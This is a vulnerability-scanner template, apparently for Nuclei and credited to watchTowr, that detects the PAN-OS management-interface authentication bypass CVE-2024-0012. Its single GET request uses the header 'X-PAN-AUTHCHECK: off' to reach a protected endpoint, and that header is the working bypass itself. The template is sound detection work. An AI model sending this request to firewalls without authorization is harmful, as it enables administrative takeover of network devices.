palo-alto-vpn-CVE-2024-0012-check-wt.yaml

id: palo-alto-vpn-CVE-2024-0012-check-wt

info:
  name: Palo Alto PAN-OS Authentication Bypass in the Management Web Interface CVE-2024-0012
  author: watchTowr
  severity: critical
  description: An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474.
  tags: palo-alto
  metadata:
    max-request: 4

http:
  - method: GET
    path:
      - "{{BaseURL}}/php/utils/CmsGetDeviceSoftwareVersion.php/.js.map"

    headers:
      X-PAN-AUTHCHECK: off

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        condition: or
        words:
          - "0.0.0"


      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Expires: 0"
          - "PHPSESSID="
          - "application/json"